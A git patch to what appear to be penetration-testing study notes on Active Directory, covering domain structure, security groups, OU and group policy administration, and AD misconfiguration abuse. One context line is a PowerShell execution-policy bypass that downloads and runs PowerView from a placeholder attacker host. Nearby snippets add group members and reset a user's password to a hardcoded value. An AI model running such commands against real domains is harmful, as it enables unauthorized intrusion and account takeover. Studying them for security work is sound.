From cf50085db371d2fd0cbe56cf1d6a58a34304c6f4 Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 27 Aug 2022 00:43:09 +0200 Subject: [PATCH] modified AD --- misc/active_directory/active_directory.md | 102 ++++++++++++++++--- misc/active_directory/ad_misconfiguration.md | 2 +- 2 files changed, 89 insertions(+), 15 deletions(-) diff --git a/misc/active_directory/active_directory.md b/misc/active_directory/active_directory.md index df0854a..a434dde 100644 --- a/misc/active_directory/active_directory.md +++ b/misc/active_directory/active_directory.md @@ -1,25 +1,28 @@ # Active Directory Enumeration +* Offers authentication in the form of centralized __IAM__ a.k.a __SSO__ and authentication via __Policy Management__ +* There are user accounts acting on machine accounts (services), in general + * Consists of - * Domain Controller - * Organizational Units - * Users + * __Domain Controller__ + * __Organizational Units__, (security principals) can be common user or machine accounts + * Users * Groups - * Trusts - * AD Domains - * AD Forest - * Policies + * __Trusts__ + * __AD Domains__ + * __AD Forest__ + * __Policies__ * Administrative accounts are - * Domain Admin - * Enterprise Admin - * Schema Admin - * Server Operator - * Account Operator + * __Domain Admin__ + * __Enterprise Admin__ + * __Schema Admin__ + * __Server Operator__ + * __Account Operator__ ## Domain Controller -* AD Domain Services data store +* AD Domain Services (AD DS) data store stores all objects on the network * Authentication and authorization * Update replication / sync with other domain controllers in the forest * Administration of domain resources @@ -32,6 +35,8 @@ ### Forest +Consists of the following objects + * __Trees__, hierarchy of domains in the AD Domain Services * __Domains__, groups of objects * __Organizational Units (OU)__, containers of objects such as groups, users, printers and other resources @@ -47,6 +52,25 @@ * __Local Admin__, administrative persmission on an object but not the DC * __Domain Users__, average user account on a local machine which may have admin permissions +* __Machine users__, + * Machine accounts have local administrational permissions + * Can be recognized by a `$` at the end of the ID + * Their passwords are rotated on a schedule + * Passwords are 120 characters long per default + +### Security Groups + +Important groups are the following + +* __Domain Controllers__, every DC in the domain +* __Domain Admins__, dc access +* __Server Operators__, administration of domain controllers but not groups +* __Backup Operators__, full read access to any file +* __Account Operators__, able to provision accounts +* __Domain Users__, every user account in the domain +* __Domain Computers__, every machine account in the domain + +* [Security Groups doc](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups) ### Policies @@ -67,7 +91,8 @@ * __NTLM__, ticket granting service * __Kerberos__, challenge/response via hashes -## Usage + +## Enumration * Cmdlets on Domain Controller * Get some help, `Get-Help Get-Command -Examples`, `Get-Command Get-*` @@ -110,3 +135,52 @@ ls -d powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi ew.ps1'); Get-NetUser | select samaccountname, description" ``` + +## Configuration + +### Configure Users and Groups + +* Use Start -> "Active Directory and Computers" to provision AD objects via __organizational units (OU)__ +* A set of users as a group with set policies are defined as __organizational unit (OU)__ +* A user is unique to a single OU + +* Default OUs are the following + * __Builtin__ + * __Users__, user accounts + * __Computers__, machine accounts + * __Domain Controllers__, contains DC in the domain + * __Managed Service Accounts__, service accounts in the domain + +* To __delete__ a OU use `View` -> `Advanced Features`. Properties menu of the OU via right click shows the checkbox `Protect object from accidental deletion` under `Object` tab -> uncheck it and delete the OU afterwards + +* To __delegate__ open properties with right click -> `Next` -> `Delegate Control` -> `Add` -> Choose user and OK -> `Next` -> Choose tasks to delegate -> `Next` -> `Finish` + +* To __change__ a user password via powershell +```sh +Set-ADAccountPassword -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose +``` +* To let the user __change__ the password at the next login +```sh +Set-ADUser -ChangePasswordAtLogon $true -Identity -Verbose +``` + +### Managing Machine Users + +* `Computer` OU should be split into at least `Workstations` and `Servers` + +### Group Policies + +* __Group Policy Objects__ are applied to OUs + +* Use the application `Group Policy Management` to apply policies to UOs +* GPOs under `Group Policy Objects` for the specific domain can be modified. These will be inherited to all UOs. You can see the links to the OUs on the right hand site if you click the GPO on the left +* Child OUs inherit the policies from parent UOs +* `Security Filters` can be set as well here +* The `Settings` tab of a policy shows its actual content +* Right click on a Policy -> `Edit` to change the content of the policy. There are templates for multiple common policies + +* `SYSVOL` as a SMB share is used to distribute the GPOs in the domain, it maps to `C:\Windows\SYSVOL\sysvol\` on the domain controller +* To force an update of changed policies across the domain do +```sh +gpupdate /force +``` diff --git a/misc/active_directory/ad_misconfiguration.md b/misc/active_directory/ad_misconfiguration.md index 5f91fe5..1ca3427 100644 --- a/misc/active_directory/ad_misconfiguration.md +++ b/misc/active_directory/ad_misconfiguration.md @@ -35,7 +35,7 @@ Add-GroupMember "" -Members "" Get-ADGroupMember -Identity "" ``` -* Set new password for user, afterwards reconnect session +* __Set new password for user__, afterwards reconnect session ```sh $Password = ConvertTo-SecureString "password123#" -AsPlainText -Force Set-ADAccountPassword -Identity "" -Reset -NewPassword $Password